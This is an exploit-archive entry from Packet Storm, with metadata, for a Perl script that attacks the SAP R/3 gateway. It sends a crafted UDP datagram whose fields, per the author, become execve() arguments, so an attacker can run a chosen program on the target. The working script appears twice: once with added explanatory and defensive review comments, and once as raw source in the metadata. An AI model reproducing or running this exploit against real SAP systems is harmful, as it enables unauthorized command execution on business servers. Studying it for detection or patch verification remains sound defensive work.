ID PACKETSTORM:52024 Type packetstorm Reporter Nicob Modified 2006-11-14T00:00:00
Description
`#!/usr/bin/perl -w
use IO::Socket;
# Unix version of the FX SAP R/3 gwrd vuln.
#
# We partially control a call to execve() made by lnaxdm/sapsys
# Easily exploitable with local access
# Could be done remotely under some conditions
#
# 2003, FX of Phenoelit <fx@phenoelit.de> (Win32 original code)
# 2005, Nicob <nicob@nicob.net> (Unix version)
#
# Top-level driver. Usage, as implied by the argument checks below:
#   <script> <filename> <arg1> <arg3> <host> [port]
# It assembles one datagram in the package global $request and then calls
# send_UDP with the host and port; send_UDP reads $request directly.
#
# NOTE(review): there is no `use strict`, so every variable in this run is a
# package global. The truthiness tests below also treat a literal "0"
# argument as if it were missing.
#
# Defensive reading: per the author's header comments, the receiving gateway
# process uses fields of this datagram as execve() arguments. The page names
# no advisory or patch identifier, so the fixed release has to be confirmed
# with the vendor. Independently of patching, the gateway port should not be
# reachable from untrusted hosts.
#
# Disable output buffering on the currently selected handle (STDOUT).
$|=1;
# Positional arguments are consumed in this order: filename, arg1, arg3, host.
die "Give filename" unless ($command=shift);
die "Give arg1" unless ($param1=shift);
die "Give arg3" unless ($param3=shift);
# Both short fields occupy fixed 8-byte slots in the datagram, so longer
# values are refused rather than truncated.
die "Arg1 too long" if (length($param1) > 8);
die "Arg3 too long" if (length($param3) > 8);
die "Give host" unless ($host=shift);
# Optional fifth argument; falls back to 3317 when absent.
# NOTE(review): the default presumably matches the author's test system;
# confirm which gateway port a given installation actually exposes.
$port="3317" unless ($port=shift);
# Datagram layout as built here: 2 header bytes (0x01 0x02), 50 bytes of 'B'
# filler, an 8-byte space-padded field, an 11-byte literal separator, a second
# 8-byte space-padded field, a 21-byte literal separator, then the
# NUL-terminated filename.
# The header bytes, the filler and both separators are constants, so every
# datagram this script emits contains them; that makes them usable as a
# network signature for this specific PoC.
# NOTE(review): the page does not document the gateway protocol, so whether
# the service requires these exact filler/separator values is unconfirmed.
$request =
"\x01".
"\x02".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
# Per the author: this field becomes the second argument to execve().
# Always 8 characters on the wire: the value followed by space padding.
$param1.
" " x (8 - length($param1)).
"_0_0_0_0_0_".
# Per the author: this field becomes the fourth argument to execve().
# Always 8 characters on the wire: the value followed by space padding.
$param3.
" " x (8 - length($param3)).
"_1_1_1_1_1__2_2_2_2_2".
# Per the author: this field becomes the first argument to execve().
# Unlimited length; terminated with a NUL byte.
$command."\x00";
# Hand off to the UDP sender. No reply is read, so the script exits 0
# whether or not the remote side acted on the datagram.
&send_UDP($host,$port);
exit 0;
sub send_UDP {
    # Send the datagram held in the file-level global $request to the given
    # host and port over UDP, then close the socket.
    #
    # Arguments: destination host, destination port.
    # Dies if the socket object cannot be created. The result of the print
    # is not checked and no reply is read, so a failed or ignored send goes
    # unreported to the caller.
    my ($dest, $port) = @_;

    my %socket_args = (
        Proto    => "udp",
        PeerAddr => $dest,
        PeerPort => "$port",
    );
    my $socket = IO::Socket::INET->new(%socket_args);
    if (!$socket) {
        die "cannot get socket for $dest";
    }

    $socket->autoflush(1);
    # $request is not a parameter; it is the global built by the top-level code.
    print {$socket} $request;
    close $socket;
}
`
{"type": "packetstorm", "published": "2006-11-14T00:00:00", "reporter": "Nicob", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "8e8f071086b4620b62c0c53051c1cd1f"}, {"key": "modified", "hash": "faf4af2affe572d4955d2a8f50774e8f"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "faf4af2affe572d4955d2a8f50774e8f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "3aafa0182809c628bb39aeaad27b7636"}, {"key": "sourceData", "hash": "e3da0a6aa70f407c0f400fea19c1e868"}, {"key": "sourceHref", "hash": "254c3047b61c1475a534a6dc6963e87a"}, {"key": "title", "hash": "e3538df13da8457ecf9f82c65c6f7469"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`#!/usr/bin/perl -w \nuse IO::Socket; \n \n# Unix version of the FX SAP R/3 gwrd vuln. \n# \n# We partially control a call to excve() made by lnaxdm/sapsys \n# Easily exploitable with local access \n# Could be done remotely under some conditions \n# \n# 2003, FX of Phenoelit <fx@phenoelit.de> (Win32 original code) \n# 2005, Nicob <nicob@nicob.net> (Unix version) \n# \n \n$|=1; \n \ndie \"Give filename\" unless ($command=shift); \ndie \"Give arg1\" unless ($param1=shift); \ndie \"Give arg3\" unless ($param3=shift); \ndie \"Arg1 too long\" if (length($param1) > 8); \ndie \"Arg3 too long\" if (length($param3) > 8); \ndie \"Give host\" unless ($host=shift); \n \n$port=\"3317\" unless ($port=shift); \n \n$request = \n\"\\x01\". \n\"\\x02\". \n\"BBBBBBBBBB\". \n\"BBBBBBBBBB\". \n\"BBBBBBBBBB\". \n\"BBBBBBBBBB\". \n\"BBBBBBBBBB\". \n \n# Second arg to execve() \n# 8 chars long \n$param1. 
\n\" \" x (8 - length($param1)). \n \n\"_0_0_0_0_0_\". \n \n# Fourth arg to execve() \n# 8 chars long \n$param3. \n\" \" x (8 - length($param3)). \n \n\"_1_1_1_1_1__2_2_2_2_2\". \n \n# First arg to execve() \n# Unlimted length, end with %00 \n$command.\"\\x00\"; \n \n&send_UDP($host,$port); \n \nexit 0; \n \nsub send_UDP { \nmy $remote; \nmy $rline; \nmy $dest; \nmy $port; \n \n($dest,$port) = @_; \n \n$remote = \nIO::Socket::INET->new(Proto=>\"udp\",PeerAddr=>$dest,PeerPort=>\"$port\",); \nunless ($remote) { die \"cannot get socket for $dest\" } \n$remote->autoflush(1); \nprint $remote $request; \n \nclose $remote; \n} \n`\n", "viewCount": 1, "history": [], "lastseen": "2016-11-03T10:19:25", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/52024/r3mote_unix_UDPexec.pl.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/52024/r3mote_unix_UDPexec.pl.txt", "title": "r3mote_unix_UDPexec.pl.txt", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:19:25"}, "dependencies": {"references": [], "modified": "2016-11-03T10:19:25"}, "vulnersScore": -0.3}, "references": [], "id": "PACKETSTORM:52024", "hash": "60af39e0b8bbf0d0036af1d67bbc990e5b3d34e7ec68a682e110ca8d66fd7666", "edition": 1, "cvelist": [], "modified": "2006-11-14T00:00:00", "description": ""}